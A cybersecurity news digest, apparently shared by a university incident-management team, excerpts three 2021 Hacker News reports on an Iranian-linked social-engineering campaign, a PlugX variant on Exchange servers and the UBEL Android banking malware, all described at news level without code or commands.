Hackers Posed as Aerobics Instructors for Years to Target Aerospace Employees
Enterprise security firm Proofpoint attributed the covert operation to a state-aligned threat actor it tracks as TA456, and by the wider cybersecurity community under the monikers Tortoiseshell and Imperial Kitten.
Stack Overflow Teams
«Using the social media persona 'Marcella Flores,' TA456 built a relationship across corporate and personal communication platforms with an employee of a small subsidiary of an aerospace defense contractor,» Proofpoint said in a report shared with The Hacker News. «In early June 2021, the threat actor attempted to capitalize on this relationship by sending the target malware via an ongoing email communication chain».
Prevent Data Breaches
Facebook has suspended the Flores account from its platform in a coordinated takedown of users linked to Iranian hacker activity. «TA456 demonstrated a significant operational investment by cultivating a relationship with a target's employee over years in order to deploy LEMPO to conduct reconnaissance into a highly secured target environment within the defense industrial base,» Proofpoint researchers said. «This campaign exemplifies the persistent nature of certain state aligned threats and the human engagement they are willing to conduct in support of espionage operations».
Source — https://thehackernews.com/2021/07/hackers-posed-as-aerobics-instructors.html
Chinese Hackers Implant PlugX Variant on Compromised MS Exchange Servers
Dating back to as early as 2008, PlugX is a fully-featured second-stage implant with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote command shell.
Stack Overflow Teams
« New features were observed in this variant, including enhanced payload-delivery mechanisms and abuse of trusted binaries».
MS Exchange Servers
PKPLUG now joins the list, according to Unit 42, who found the attackers bypassing antivirus detection mechanisms to target Microsoft Exchange servers by leveraging legitimate executables such as BITSAdmin to retrieve a seemingly innocuous file from an actor-controlled GitHub repository. The file, which houses the encrypted and compressed PlugX payload, alludes to a freely available advanced repair and optimization tool that’s designed to clean up and fix issues in the Windows Registry.
Source — https://thehackernews.com/2021/07/chinese-hackers-implant-plugx-variant.html
UBEL is the New Oscorp — Android Credential Stealing Malware Active in the Wild
Italy’s CERT-AGID, in late January, disclosed details about Oscorp, a mobile malware developed to attack multiple financial targets with the goal of stealing funds from unsuspecting victims.
Stack Overflow Teams
«By analyzing some related samples, we found multiple indicators linking Oscorp and UBEL to the same malicious codebase, suggesting a fork of the same original project or just a rebrand by other affiliates, as its source-code appears to be shared between multiple ,» Italian cybersecurity company Cleafy said Tuesday, charting the malware’s evolution.
Prevent Ransomware Attacks
Once downloaded on the device, the malware attempts to install itself as a service and hide its presence from the target, thereby achieving persistence for extended periods of time. Interestingly, the use of WebRTC to interact with the compromised Android phone in real-time circumvents the need to enroll a new device and take over an account toperform fraudulent activities. «The main goal for this by using this feature, is to avoid a ‘new device enrollment’, thus drastically reducing the possibility of being flagged ‘as suspicious’ since device’s fingerprinting indicators are well-known from the bank’s perspective,» the researchers said.
Source — https://thehackernews.com/2021/07/ubel-is-new-oscorp-android-credential.html
Stay Focused. Stay Vigilant.
Cyber Threat Incident Management Team — Cyber Security Community @ SLIIT